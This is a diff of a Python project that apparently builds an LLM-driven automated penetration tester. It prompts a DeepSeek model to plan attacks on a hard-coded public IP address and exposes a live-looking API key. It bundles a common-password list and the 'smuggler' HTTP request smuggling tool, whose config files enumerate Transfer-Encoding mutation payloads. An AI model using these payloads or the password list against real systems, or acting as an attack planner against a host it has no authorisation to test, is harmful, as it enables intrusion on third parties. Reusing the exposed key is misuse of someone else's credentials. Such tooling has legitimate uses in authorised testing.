# 请用知识引擎原子能力API Key将下行替换为:api_key="sk-xxx",
api_key="sk-fGBYaQLHykBOQsFwVrQdIFTsYr8YDtDVDQWFU41mFsmvfNPc",
base_url="https://api.lkeap.cloud.tencent.com/v1",
)
completion = client.chat.completions.create(
model="deepseek-v3", # 此处以 deepseek-r1 为例,可按需更换模型名称。
messages=[
{'role': 'user', 'content': '你是一个渗透测试专家,正在对IP58.216.217.70进行渗透测试。当前阶段是[信息收集]。请生成下一步的指令。'}
],
)
# 通过reasoning_content字段打印思考过程
# print("思考过程:")
# print(completion.choices[0].message.reasoning_content)
# 通过content字段打印最终答案
print("最终答案:")
print(completion.choices[0].message.content)
print("\n" + "=" * 20 + "Token 使用情况" + "=" * 20 + "\n")
print(completion.usage)
def print_hi(name):
# Use a breakpoint in the mycode line below to debug your script.
print(f'Hi, {name}') # Press Ctrl+F8 to toggle the breakpoint.
#对某个目标进行测试
def startWork(targets):
TaskM = TaskManager()
tlist = targets.split(',')
for target in tlist:
TaskM.start_task(target)
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
print_hi('PyCharm')
LLMtest()
# See PyCharm help at https://www.jetbrains.com/help/pycharm/

238
mycode/DBManager.py

@ -0,0 +1,238 @@
import pymysql
import sqlite3
import threading
import os
import json
from myutils.ConfigManager import myCongif
from myutils.MyLogger_logger import LogHandler
from myutils.MyTime import get_local_timestr
class DBManager:
#实例化数据库管理对象,并连接数据库
#itype=0 使用mysql数据库,1-使用sqlite数据库
def __init__(self):
self.logger = LogHandler().get_logger("DBManager")
self.lock = threading.Lock()
self.itype = myCongif.get_data("DBType")
self.ok = False
if self.itype ==0:
self.host = myCongif.get_data('mysql.host')
self.port = myCongif.get_data('mysql.port')
self.user = myCongif.get_data('mysql.user')
self.passwd = myCongif.get_data('mysql.passwd')
self.database = myCongif.get_data('mysql.database')
self.connection = None
self.cursor = None
elif self.itype ==1:
self.dbfile = myCongif.get_data("sqlite")
if not os.path.exists(self.dbfile):
self.dbfile = "../" + self.dbfile #直接运行DBManager时初始路径不是在根目录
if not os.path.exists(self.dbfile):
raise FileNotFoundError(f"Database file {self.dbfile} does not exist.")
else:
self.logger.error("错误的数据库类型,请检查")
def __del__(self):
if self.ok:
self.cursor.close()
self.connection.close()
self.cursor = None
self.connection = None
self.logger.debug("DBManager销毁")
def connect(self):
try:
if self.itype ==0:
self.connection = pymysql.connect(host=self.host, port=self.port, user=self.user,
passwd=self.passwd, db=self.database,charset='utf8')
self.cursor = self.connection.cursor()
elif self.itype ==1:
self.connection = sqlite3.connect(self.dbfile)
self.cursor = self.connection.cursor()
self.ok = True
self.logger.debug("服务器端数据库连接成功")
return True
except:
self.logger.error("服务器端数据库连接失败")
return False
# 判断数据库连接是否正常,若不正常则重连接
def Retest_conn(self):
if self.itype == 0: #除了mysql,sqlite3不需要判断连接状态
try:
self.connection.ping()
except:
return self.connect()
return True
# 执行数据库查询操作 1-只查询一条记录,其他所有记录
def do_select(self, strsql, itype=0):
# self.conn.begin()
self.lock.acquire()
data = None
if self.Retest_conn():
try:
self.cursor.execute(strsql)
self.connection.commit() # select要commit提交事务,是存在获取不到最新数据的问题(innoDB事务机制)
except Exception as e:
self.logger.error("do_select异常报错:%s" % str(e))
self.lock.release()
return None
if itype == 1:
data = self.cursor.fetchone()
else:
data = self.cursor.fetchall()
self.lock.release()
return data
# 执行数据库语句
def do_sql(self, strsql, data=None):
bok = False
self.lock.acquire()
if self.Retest_conn():
try:
# self.conn.begin()
if data:
iret = self.cursor.executemany(strsql, data) #批量执行sql语句
else:
iret = self.cursor.execute(strsql)
self.connection.commit()
bok = True
except Exception as e:
self.logger.error("执行数据库语句%s出错:%s" % (strsql, str(e)))
self.connection.rollback()
self.lock.release()
return bok
def safe_do_sql(self,strsql,params):
bok = False
self.lock.acquire()
if self.Retest_conn():
try:
self.cursor.execute(strsql, params)
self.connection.commit()
bok = True
except Exception as e:
self.logger.error("执行数据库语句%s出错:%s" % (strsql, str(e)))
self.connection.rollback()
self.lock.release()
return bok
def is_json(self,s:str) -> bool:
if not isinstance(s, str):
return False
try:
json.loads(s)
return True
except json.JSONDecodeError:
return False
except Exception:
return False # 处理其他意外异常(如输入 None)
#---------------------特定数据库操作函数---------------------
def start_task(self,task_name,task_target) -> int:
'''
数据库添加检测任务
:param task_name:
:param task_target:
:return: task_id
'''
task_id =0
start_time = get_local_timestr()
sql = "INSERT INTO task (task_name,task_target,start_time) VALUES (%s,%s,%s)"
params = (task_name,task_target,start_time)
self.safe_do_sql(sql,params)
task_id = self.cursor.lastrowid
return task_id
#指令执行结果入库
def insetr_result(self,task_id,instruction,result,do_sn,start_time,end_time,source_result,ext_params):
# 统一将 result 转为 JSON 字符串(无论原始类型)
try:
if not isinstance(result, str):
str_result = json.dumps(result, ensure_ascii=False)
else:
# 如果是字符串,先验证是否为合法 JSON(可选)
json.loads(result)
str_result = result
except (TypeError, json.JSONDecodeError):
str_result = json.dumps(str(result)) # 兜底处理非 JSON 字符串
# 使用参数化查询
sql = """
INSERT INTO task_result
(task_id, instruction, result, do_sn,start_time,end_time,source_result,is_user,is_vulnerability)
VALUES
(%s, %s, %s, %s, %s, %s,%s,%s,%s)
"""
params = (task_id, instruction, str_result, do_sn,start_time,end_time,source_result,ext_params['is_user'],
ext_params['is_vulnerability'])
return self.safe_do_sql(sql,params)
#llm数据入库
def insert_llm(self,task_id,prompt,reasoning_content,content,post_time,llm_sn):
str_reasoning = ""
str_content = ""
try:
if not isinstance(reasoning_content, str):
str_reasoning = json.dumps(reasoning_content, ensure_ascii=False)
else:
# 如果是字符串,先验证是否为合法 JSON(可选)
json.loads(reasoning_content)
str_reasoning = reasoning_content
except (TypeError, json.JSONDecodeError):
str_reasoning = json.dumps(str(reasoning_content)) # 兜底处理非 JSON 字符串
try:
if not isinstance(content, str):
str_content = json.dumps(content, ensure_ascii=False)
else:
# 如果是字符串,先验证是否为合法 JSON(可选)
json.loads(content)
str_content = content
except (TypeError, json.JSONDecodeError):
str_content = json.dumps(str(content)) # 兜底处理非 JSON 字符串
sql="""
INSERT INTO task_llm
(task_id,do_sn,prompt,reasoning_content,content,start_time)
VALUES
(%s, %s, %s, %s, %s, %s)
"""
params = (task_id,llm_sn,prompt,str_reasoning,str_content,post_time)
return self.safe_do_sql(sql,params)
def test(self):
# 建立数据库连接
conn = pymysql.connect(
host='localhost',
port=3306,
user='username',
password='password',
database='database_name'
)
# 创建游标对象
cursor = conn.cursor()
# 执行 SQL 查询
query = "SELECT * FROM table_name"
cursor.execute(query)
# 获取查询结果
result = cursor.fetchall()
# 输出结果
for row in result:
print(row)
# 关闭游标和连接
cursor.close()
conn.close()
if __name__ == "__main__":
mDBM = DBManager()
mDBM.connect()
print(mDBM.start_task("11","22"))

8
mycode/LLMBase.py

@ -0,0 +1,8 @@
import openai
from openai import OpenAI
#LLM的基类
class LLMBase:
def __init__(self):
pass

56
myutils/ConfigManager.py

@ -0,0 +1,56 @@
#!/usr/bin/env python
# -*- coding:utf-8 -*-
__author__ = 'ZL'
import yaml,os
class ConfigManager():
def __init__(self,congif_path='config.yaml'):
self.ok = False
if os.path.exists(congif_path):
self.file_path = congif_path
self.ok = self.read_yaml()
else:
congif_path = "../" + congif_path
if os.path.exists(congif_path):
self.file_path = congif_path
self.ok= self.read_yaml()
else:
raise Exception('没有找到%s文件路径'%congif_path)
print("ConfigManager实例化")
def __del__(self):
print("ConfigManager销毁")
def read_yaml(self):
with open(self.file_path,'r',encoding='utf_8') as f:
self.data = yaml.safe_load(f)
return True
return False
'''
.作为层级节点分割符
'''
def get_data(self,pwd=None):
if self.ok:
if pwd is None:
return None
nodes = pwd.split('.')
current_node= self.data
for node in nodes:
if node in current_node:
current_node = current_node[node]
else:
print(f"Node {node} not found in the YAML data.")
return None
return current_node
#这种方法实现的单例优点是简单,但不能动态创建实例,程序加载时就已实例化。
myCongif = ConfigManager()
if __name__ == '__main__':
r = myCongif.get_data('mysql.host1')
print(r)

31
myutils/FileManager.py

@ -0,0 +1,31 @@
class FileManager:
def __init__(self):
pass
def write_file(self,file_path,write_type,content):
'''
:param file_path:
:param write_type: w-覆盖写a-追加
:param content:
:return:
'''
with open(file_path,write_type,encoding="utf-8") as f:
f.write(content)
def read_file(self,file_path,read_type):
'''
:param file_path:
:param read_type: 1-全读返回2--返回行list
:return:
'''
with open(file_path, "r", encoding="utf-8") as f:
if read_type ==1:
content = f.read()
elif read_type ==2:
content = f.readlines()
else:
content = ""
return content

33
myutils/MyDeque.py

@ -0,0 +1,33 @@
from collections import deque
from threading import Thread, Lock
class MyDeque:
def __init__(self,maxlen=1):
self.len = maxlen
self.dq = deque(maxlen=maxlen)
self.lock = Lock()
def __del__(self):
del self.dq
def isfull(self):
if len(self.dq) == self.len:
return True
return False
def myappend(self,object):
with self.lock:
self.dq.append(object)
def mypopleft(self):
object = None
with self.lock:
if self.dq:
object = self.dq.popleft()
else:
pass
return object
def myclear(self):
with self.lock:
self.dq.clear()

73
myutils/MyLogger_logger.py

@ -0,0 +1,73 @@
from loguru import logger
import os
from functools import wraps
from myutils.ConfigManager import myCongif
'''
@logger.catch() 异常捕获注解
----
TRACE 5
DEBUG 10
INFO 20
SUCCESS 25
WARNING 30
ERROR 40
CRITICAL 50
----
'''
#singleton--使用装饰器来保障单一实例的好处是能够动态加载,但线程不安全
def singleton(cls):
instances = {}
@wraps(cls)
def get_instance(*args, **kwargs):
if cls not in instances:
instances[cls] = cls(*args, **kwargs)
return instances[cls]
return get_instance
@singleton
class LogHandler():
def __init__(self, log_dir=myCongif.get_data('log_dir')):
# 确保日志目录存在
if not os.path.exists(log_dir):
os.makedirs(log_dir)
# 清除所有以前的处理器
logger.remove()
# 配置控制台输出
logger.add(lambda msg: print(msg, end=""),
format="{time:YYYY-MM-DD_HH:mm:ss}-{extra[caller]}-{level}:{message}",
level=myCongif.get_data('show_log_level'))
# 配置文件输出
logger.add("logs/{time:YYYY-MM-DD}.log", rotation="00:00", retention="90 days",
format="{time:YYYY-MM-DD_HH:mm:ss}-{extra[caller]}-{level}:{message}",
level=myCongif.get_data('file_log_level'))
def get_logger(self, caller):
# 返回一个带有调用者信息的logger
return logger.bind(caller=caller)
# 示例类A
class ClassA:
def __init__(self):
self.logger = LogHandler().get_logger("ClassA")
def do_something(self):
self.logger.warning("ClassA is doing something.")
# 示例类B
class ClassB:
def __init__(self):
self.logger = LogHandler().get_logger("ClassB")
def do_something(self):
self.logger.error("ClassB is doing something.")
if __name__ == "__main__":
a = ClassA()
b = ClassB()
r = myCongif.get_data('url')
print(r)
a.do_something()
b.do_something()

12
myutils/MyTime.py

@ -0,0 +1,12 @@
import time
def get_local_timestr() -> str:
'''
获取当前时间的格式化字符串%Y-%m-%d %H:%M:%S
:return:
'''
timestamp = time.time()
# 转换为结构化时间对象,再格式化为字符串
struct_time = time.localtime(timestamp) # 本地时区时间‌:ml-citation{ref="3,5" data="citationList"}
formatted_time = time.strftime("%Y-%m-%d %H:%M:%S",struct_time)
return formatted_time

67
myutils/ReManager.py

@ -0,0 +1,67 @@
import ipaddress
import re
'''
正则管理类用来实现对各类字符串进行合法性校验
'''
class ReManager():
def is_valid_ip(self,ip):
try:
ipaddress.ip_address(ip)
return True
except ValueError:
return False
def is_valid_subnet_mask(self,subnet_mask):
# 将子网掩码字符串转换为整数列表
bits = [int(b) for b in subnet_mask.split('.')]
if len(bits) != 4:
return False
# 检查每个部分是否在0-255范围内
if not all(0 <= b <= 255 for b in bits):
return False
# 检查子网掩码是否连续为1后跟连续为0
mask_int = (bits[0] << 24) + (bits[1] << 16) + (bits[2] << 8) + bits[3]
binary_mask = bin(mask_int)[2:].zfill(32)
ones_count = binary_mask.count('1')
if not all(bit == '1' for bit in binary_mask[:ones_count]) or not all(
bit == '0' for bit in binary_mask[ones_count:]):
return False
return True
def is_valid_port(self,port):
try:
port = int(port) # 尝试将端口转换为整数
if 1 <= port <= 65535: # 检查端口号是否在合法范围内
return True
else:
return False
except ValueError:
# 如果端口不是整数,返回False
return False
def is_valid_rtsp_url(self,url):
pattern = re.compile(
r'^(rtsp:\/\/)' # Start with rtsp://
r'(?P<host>(?:[a-zA-Z0-9_\-\.]+)|(?:\[[a-fA-F0-9:]+\]))' # Hostname or IPv4/IPv6 address
r'(?::(?P<port>\d+))?' # Optional port number
r'(?P<path>\/[a-zA-Z0-9_\-\.\/]*)?$' # Optional path
)
match = pattern.match(url)
return match is not None
mReM = ReManager()
if __name__ == "__main__":
urls = [
"rtsp://192.168.1.1:554/stream1",
"rtsp://example.com/stream",
"rtsp://[2001:db8::1]:554/stream",
"rtsp://localhost",
"http://example.com",
"ftp://example.com/stream"
]
for url in urls:
print(f"{url}: {mReM.is_valid_rtsp_url(url)}")

32
myutils/ReturnParams.py

@ -0,0 +1,32 @@
class ReturnParams:
def __init__(self, **kwargs):
# 内部存储所有返回参数
self._data = dict(kwargs)
def __getattr__(self, name):
# 如果属性不存在,返回 None 而不是抛出异常
return self._data.get(name, None)
# try:
# return self._data[name]
# except KeyError:
# raise AttributeError(f"'ReturnParams' object has no attribute '{name}'")
def __setattr__(self, name, value):
# 特殊属性直接写入__dict__
if name == "_data":
super().__setattr__(name, value)
else:
self._data[name] = value
def __getitem__(self, key):
# 如果 key 不存在,返回 None
return self._data.get(key, None)
def __setitem__(self, key, value):
self._data[key] = value
def to_dict(self):
return self._data.copy()
def __repr__(self):
return f"{self.__class__.__name__}({self._data})"

0
payload/mails

50
payload/passwords

@ -0,0 +1,50 @@
123456
admin123
Password1
qwerty123
20252025
password
Admin@2025
welcome2025
12345678
P@ssw0rd
123456789
letmein
sunshine!
123abc
Hello123
iloveyou
football
trustno1
123qwe
Dragon
superman
baseb@ll
starwars
654321
Master
welcome
monkey
!@#$%^&*
shadow
Ashley
123123
michael
mustang
charlie
jordan
jessica
freedom
hello123
whatever
passw0rd
1234
ninja
aaaaaa
121212
access
loveme
photoshop
solo
princess
abc123

154
payload/smuggler-master/.gitignore

@ -0,0 +1,154 @@
# Editors
.vscode/
.idea/
# Vagrant
.vagrant/
# Mac/OSX
.DS_Store
# Windows
Thumbs.db
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
# C extensions
*.so
# Distribution / packaging
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
.hypothesis/
.pytest_cache/
cover/
# Translations
*.mo
*.pot
# Django stuff:
*.log
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# Scrapy stuff:
.scrapy
# Sphinx documentation
docs/_build/
# PyBuilder
.pybuilder/
target/
# Jupyter Notebook
.ipynb_checkpoints
# IPython
profile_default/
ipython_config.py
# pyenv
# For a library or package, you might want to ignore these files since the mycode is
# intended to run in multiple environments; otherwise, check them in:
# .python-version
# pipenv
# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
# However, in case of collaboration, if having platform-specific dependencies or dependencies
# having no cross-platform support, pipenv may install dependencies that don't work, or not
# install all needed dependencies.
#Pipfile.lock
# PEP 582; used by e.g. github.com/David-OConnor/pyflow
__pypackages__/
# Celery stuff
celerybeat-schedule
celerybeat.pid
# SageMath parsed files
*.sage.py
# Environments
.env
.venv
env/
venv/
ENV/
env.bak/
venv.bak/
# Spyder project settings
.spyderproject
.spyproject
# Rope project settings
.ropeproject
# mkdocs documentation
/site
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# pytype static type analyzer
.pytype/
# Cython debug symbols
cython_debug/
# Smuggler results
payloads/*.txt

21
payload/smuggler-master/LICENSE

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2020 Evan Custodio
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

139
payload/smuggler-master/README.md

@ -0,0 +1,139 @@
```
______ _
/ _____) | |
( (____ ____ _ _ ____ ____| | _____ ____
\____ \| \| | | |/ _ |/ _ | || ___ |/ ___)
_____) ) | | | |_| ( (_| ( (_| | || ____| |
(______/|_|_|_|____/ \___ |\___ |\_)_____)_|
(_____(_____|
@defparam
```
# Smuggler
An HTTP Request Smuggling / Desync testing tool written in Python 3
## Acknowledgements
A special thanks to [James Kettle](https://skeletonscribe.net/) for his [research and methods into HTTP desyncs](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn)
And a special thanks to [Ben Sadeghipour](https://www.nahamsec.com/) for beta testing Smuggler and for allowing me to discuss my work at [Nahamcon 2020](https://nahamcon.com)
## IMPORTANT
This tool does not guarantee no false-positives or false-negatives. Just because a mutation may report OK does not mean there isn't a desync issue, but more importantly just because the tool indicates a potential desync issue does not mean there definitely exists one. The script may encounter request processors from large entities (i.e. Google/AWS/Yahoo/Akamai/etc..) that may show false positive results.
## Installation
1) git clone https://github.com/defparam/smuggler.git
2) cd smuggler
3) python3 smuggler.py -h
## Example Usage
Single Host:
```
python3 smuggler.py -u <URL>
```
List of hosts:
```
cat list_of_hosts.txt | python3 smuggler.py
```
## Options
```
usage: smuggler.py [-h] [-u URL] [-v VHOST] [-x] [-m METHOD] [-l LOG] [-q]
[-t TIMEOUT] [--no-color] [-c CONFIGFILE]
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Target URL with Endpoint
-v VHOST, --vhost VHOST
Specify a virtual host
-x, --exit_early Exit scan on first finding
-m METHOD, --method METHOD
HTTP method to use (e.g GET, POST) Default: POST
-l LOG, --log LOG Specify a log file
-q, --quiet Quiet mode will only log issues found
-t TIMEOUT, --timeout TIMEOUT
Socket timeout value Default: 5
--no-color Suppress color codes
-c CONFIGFILE, --configfile CONFIGFILE
Filepath to the configuration file of payloads
```
Smuggler at a minimum requires either a URL via the -u/--url argument or a list of URLs piped into the script via stdin.
If the URL specifies `https://` then Smuggler will connect to the host:port using SSL/TLS. If the URL specifies `http://`
then no SSL/TLS will be used at all. If only the host is specified, then the script will default to `https://`
Use -v/--vhost \<host> to specify a different host header from the server address
Use -x/--exit_early to exit the scan of a given server when a potential issue is found. In piped mode smuggler will just continue to the next host on the list
Use -m/--method \<method> to specify a different HTTP verb from POST (i.e GET/PUT/PATCH/OPTIONS/CONNECT/TRACE/DELETE/HEAD/etc...)
Use -l/--log \<file> to write output to file as well as stdout
Use -q/--quiet reduce verbosity and only log issues found
Use -t/--timeout \<value> to specify the socket timeout. The value should be high enough to conclude that the socket is hanging, but low enough to speed up testing (default: 5)
Use --no-color to suppress the output color codes printed to stdout (logs by default don't include color codes)
Use -c/--configfile \<configfile> to specify your smuggler mutation configuration file (default: default.py)
## Config Files
Configuration files are python files that exist in the ./config directory of smuggler. These files describe the content of the HTTP requests and the transfer-encoding mutations to test.
Here is example content of default.py:
```python
def render_template(gadget):
RN = "\r\n"
p = Payload()
p.header = "__METHOD__ __ENDPOINT__?cb=__RANDOM__ HTTP/1.1" + RN
# p.header += "Transfer-Encoding: chunked" +RN
p.header += gadget + RN
p.header += "Host: __HOST__" + RN
p.header += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36" + RN
p.header += "Content-type: application/x-www-form-urlencoded; charset=UTF-8" + RN
p.header += "Content-Length: __REPLACE_CL__" + RN
return p
mutations["nameprefix1"] = render_template(" Transfer-Encoding: chunked")
mutations["tabprefix1"] = render_template("Transfer-Encoding:\tchunked")
mutations["tabprefix2"] = render_template("Transfer-Encoding\t:\tchunked")
mutations["space1"] = render_template("Transfer-Encoding : chunked")
for i in [0x1,0x4,0x8,0x9,0xa,0xb,0xc,0xd,0x1F,0x20,0x7f,0xA0,0xFF]:
mutations["midspace-%02x"%i] = render_template("Transfer-Encoding:%cchunked"%(i))
mutations["postspace-%02x"%i] = render_template("Transfer-Encoding%c: chunked"%(i))
mutations["prespace-%02x"%i] = render_template("%cTransfer-Encoding: chunked"%(i))
mutations["endspace-%02x"%i] = render_template("Transfer-Encoding: chunked%c"%(i))
mutations["xprespace-%02x"%i] = render_template("X: X%cTransfer-Encoding: chunked"%(i))
mutations["endspacex-%02x"%i] = render_template("Transfer-Encoding: chunked%cX: X"%(i))
mutations["rxprespace-%02x"%i] = render_template("X: X\r%cTransfer-Encoding: chunked"%(i))
mutations["xnprespace-%02x"%i] = render_template("X: X%c\nTransfer-Encoding: chunked"%(i))
mutations["endspacerx-%02x"%i] = render_template("Transfer-Encoding: chunked\r%cX: X"%(i))
mutations["endspacexn-%02x"%i] = render_template("Transfer-Encoding: chunked%c\nX: X"%(i))
```
There are no input arguments yet on specifying your own customer headers and user-agents. It is recommended to create your own configuration file based on default.py and modify it to your liking.
Smuggler comes with 3 configuration files: default.py (fast), doubles.py (niche, slow), exhaustive.py (very slow)
default.py is the fastest because it contains less mutations.
specify configuration files using the -c/--configfile \<configfile> command line option
## Payloads Directory
Inside the Smuggler directory is the payloads directory. When Smuggler finds a potential CLTE or TECL desync issue, it will automatically dump a binary txt file of the problematic payload in the payloads directory. All payload filenames are annotated with the hostname, desync type and mutation type. Use these payloads to netcat directly to the server or to import into other analysis tools.
## Helper Scripts
After you find a desync issue feel free to use my Turbo Intruder desync scripts found Here: https://github.com/defparam/tiscripts
`DesyncAttack_CLTE.py` and `DesyncAttack_TECL.py` are great scripts to help stage a desync attack
## License
These scripts are released under the MIT license. See [LICENSE](https://github.com/defparam/smuggler/blob/master/LICENSE).

31
payload/smuggler-master/configs/default.py

@ -0,0 +1,31 @@
def render_template(gadget):
RN = "\r\n"
p = Payload()
p.header = "__METHOD__ __ENDPOINT__?cb=__RANDOM__ HTTP/1.1" + RN
# p.header += "Transfer-Encoding: chunked" +RN
p.header += gadget + RN
p.header += "Host: __HOST__" + RN
p.header += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36" + RN
p.header += "Content-type: application/x-www-form-urlencoded; charset=UTF-8" + RN
p.header += "Content-Length: __REPLACE_CL__" + RN
return p
mutations["nameprefix1"] = render_template(" Transfer-Encoding: chunked")
mutations["tabprefix1"] = render_template("Transfer-Encoding:\tchunked")
mutations["tabprefix2"] = render_template("Transfer-Encoding\t:\tchunked")
mutations["space1"] = render_template("Transfer-Encoding : chunked")
for i in [0x1,0x4,0x8,0x9,0xa,0xb,0xc,0xd,0x1F,0x20,0x7f,0xA0,0xFF]:
mutations["midspace-%02x"%i] = render_template("Transfer-Encoding:%cchunked"%(i))
mutations["postspace-%02x"%i] = render_template("Transfer-Encoding%c: chunked"%(i))
mutations["prespace-%02x"%i] = render_template("%cTransfer-Encoding: chunked"%(i))
mutations["endspace-%02x"%i] = render_template("Transfer-Encoding: chunked%c"%(i))
mutations["xprespace-%02x"%i] = render_template("X: X%cTransfer-Encoding: chunked"%(i))
mutations["endspacex-%02x"%i] = render_template("Transfer-Encoding: chunked%cX: X"%(i))
mutations["rxprespace-%02x"%i] = render_template("X: X\r%cTransfer-Encoding: chunked"%(i))
mutations["xnprespace-%02x"%i] = render_template("X: X%c\nTransfer-Encoding: chunked"%(i))
mutations["endspacerx-%02x"%i] = render_template("Transfer-Encoding: chunked\r%cX: X"%(i))
mutations["endspacexn-%02x"%i] = render_template("Transfer-Encoding: chunked%c\nX: X"%(i))

27
payload/smuggler-master/configs/doubles.py

@ -0,0 +1,27 @@
def render_template(gadget):
RN = "\r\n"
p = Payload()
p.header = "__METHOD__ __ENDPOINT__?cb=__RANDOM__ HTTP/1.1" + RN
p.header += gadget + RN
p.header += "Host: __HOST__" + RN
p.header += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36" + RN
p.header += "Content-type: application/x-www-form-urlencoded; charset=UTF-8" + RN
p.header += "Content-Length: __REPLACE_CL__" + RN
return p
for i in range(0x1,0x21):
mutations["%02x-%02x-XX-XX"%(i,i)] = render_template("%cTransfer-Encoding%c: chunked"%(i,i))
mutations["%02x-XX-%02x-XX"%(i,i)] = render_template("%cTransfer-Encoding:%cchunked"%(i,i))
mutations["%02x-XX-XX-%02x"%(i,i)] = render_template("%cTransfer-Encoding: chunked%c"%(i,i))
mutations["XX-%02x-%02x-XX"%(i,i)] = render_template("Transfer-Encoding%c:%cchunked"%(i,i))
mutations["XX-%02x-XX-%02x"%(i,i)] = render_template("Transfer-Encoding%c: chunked%c"%(i,i))
mutations["XX-XX-%02x-%02x"%(i,i)] = render_template("Transfer-Encoding:%cchunked%c"%(i,i))
for i in range(0x7F,0x100):
mutations["%02x-%02x-XX-XX"%(i,i)] = render_template("%cTransfer-Encoding%c: chunked"%(i,i))
mutations["%02x-XX-%02x-XX"%(i,i)] = render_template("%cTransfer-Encoding:%cchunked"%(i,i))
mutations["%02x-XX-XX-%02x"%(i,i)] = render_template("%cTransfer-Encoding: chunked%c"%(i,i))
mutations["XX-%02x-%02x-XX"%(i,i)] = render_template("Transfer-Encoding%c:%cchunked"%(i,i))
mutations["XX-%02x-XX-%02x"%(i,i)] = render_template("Transfer-Encoding%c: chunked%c"%(i,i))
mutations["XX-XX-%02x-%02x"%(i,i)] = render_template("Transfer-Encoding:%cchunked%c"%(i,i))

52
payload/smuggler-master/configs/exhaustive.py

@ -0,0 +1,52 @@
def render_template(gadget):
RN = "\r\n"
p = Payload()
p.header = "__METHOD__ __ENDPOINT__?cb=__RANDOM__ HTTP/1.1" + RN
p.header += gadget + RN
p.header += "Host: __HOST__" + RN
p.header += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36" + RN
p.header += "Content-type: application/x-www-form-urlencoded; charset=UTF-8" + RN
p.header += "Content-Length: __REPLACE_CL__" + RN
return p
mutations["nameprefix1"] = render_template(" Transfer-Encoding: chunked")
mutations["tabprefix1"] = render_template("Transfer-Encoding:\tchunked")
mutations["tabprefix2"] = render_template("Transfer-Encoding\t:\tchunked")
mutations["spacejoin1"] = render_template("Transfer Encoding: chunked")
mutations["underjoin1"] = render_template("Transfer_Encoding: chunked")
mutations["smashed"] = render_template("Transfer Encoding:chunked")
mutations["space1"] = render_template("Transfer-Encoding : chunked")
mutations["valueprefix1"] = render_template("Transfer-Encoding: chunked")
mutations["vertprefix1"] = render_template("Transfer-Encoding:\u000Bchunked")
mutations["commaCow"] = render_template("Transfer-Encoding: chunked, cow")
mutations["cowComma"] = render_template("Transfer-Encoding: cow, chunked")
mutations["contentEnc"] = render_template("Content-Encoding: chunked")
mutations["linewrapped1"] = render_template("Transfer-Encoding:\n chunked")
mutations["quoted"] = render_template("Transfer-Encoding: \"chunked\"")
mutations["aposed"] = render_template("Transfer-Encoding: 'chunked'")
mutations["lazygrep"] = render_template("Transfer-Encoding: chunk")
mutations["sarcasm"] = render_template("TrAnSFer-EnCODinG: cHuNkeD")
mutations["yelling"] = render_template("TRANSFER-ENCODING: CHUNKED")
mutations["0dsuffix"] = render_template("Transfer-Encoding: chunked\r")
mutations["tabsuffix"] = render_template("Transfer-Encoding: chunked\t")
mutations["revdualchunk"] = render_template("Transfer-Encoding: cow\r\nTransfer-Encoding: chunked")
mutations["0dspam"] = render_template("Transfer\r-Encoding: chunked")
mutations["nested"] = render_template("Transfer-Encoding: cow chunked bar")
mutations["spaceFF"] = render_template("Transfer-Encoding:\xFFchunked")
mutations["accentCH"] = render_template("Transfer-Encoding: ch\x96nked")
mutations["accentTE"] = render_template("Transf\x82r-Encoding: chunked")
mutations["x-rout"] = render_template("X:X\rTransfer-Encoding: chunked")
mutations["x-nout"] = render_template("X:X\nTransfer-Encoding: chunked")
for i in range(0x1,0x20):
mutations["midspace-%02x"%i] = render_template("Transfer-Encoding:%cchunked"%(i))
mutations["postspace-%02x"%i] = render_template("Transfer-Encoding%c: chunked"%(i))
mutations["prespace-%02x"%i] = render_template("%cTransfer-Encoding: chunked"%(i))
mutations["endspace-%02x"%i] = render_template("Transfer-Encoding: chunked%c"%(i))
for i in range(0x7F,0x100):
mutations["midspace-%02x"%i] = render_template("Transfer-Encoding:%cchunked"%(i))
mutations["postspace-%02x"%i] = render_template("Transfer-Encoding%c: chunked"%(i))
mutations["prespace-%02x"%i] = render_template("%cTransfer-Encoding: chunked"%(i))
mutations["endspace-%02x"%i] = render_template("Transfer-Encoding: chunked%c"%(i))

3
